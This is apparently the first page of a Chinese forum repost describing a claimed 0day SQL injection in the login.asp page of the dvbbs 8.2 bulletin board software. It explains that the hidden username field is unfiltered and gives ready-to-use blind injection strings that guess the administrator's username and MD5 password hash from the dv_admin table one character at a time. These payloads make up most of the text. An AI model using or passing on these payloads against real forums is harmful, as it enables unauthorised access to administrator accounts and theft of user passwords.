昨天有人贴出漏漏洞。。问题出在LOGIN.ASP中。。。具体引用原文如下：

　　漏洞描述：

　　(引用文字具体在：)

　　中国应用最广泛的论坛程序，最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp

　　Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号，导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。

　　判断漏洞

　　特别注意：admin等。。。必须在论坛有注册。。。

　　就是登陆名必须是已经在论坛注册了的。。

　　根据返回信息，第一条显示用户名或密码错误第二条显示无此用户，猜解用户

　　where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1

　　where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1

　　……………………….

　　……………………

　　…………………….

　　猜解密码(md5加密)

　　where' and 1=(select count(*) from dv_admin where left(password,1)='1') and '1'='1

　　where' and 1=(select count(*) from dv_admin where left(password,2)='15') and '1'='1

[1] [2] [3] [4] 下一页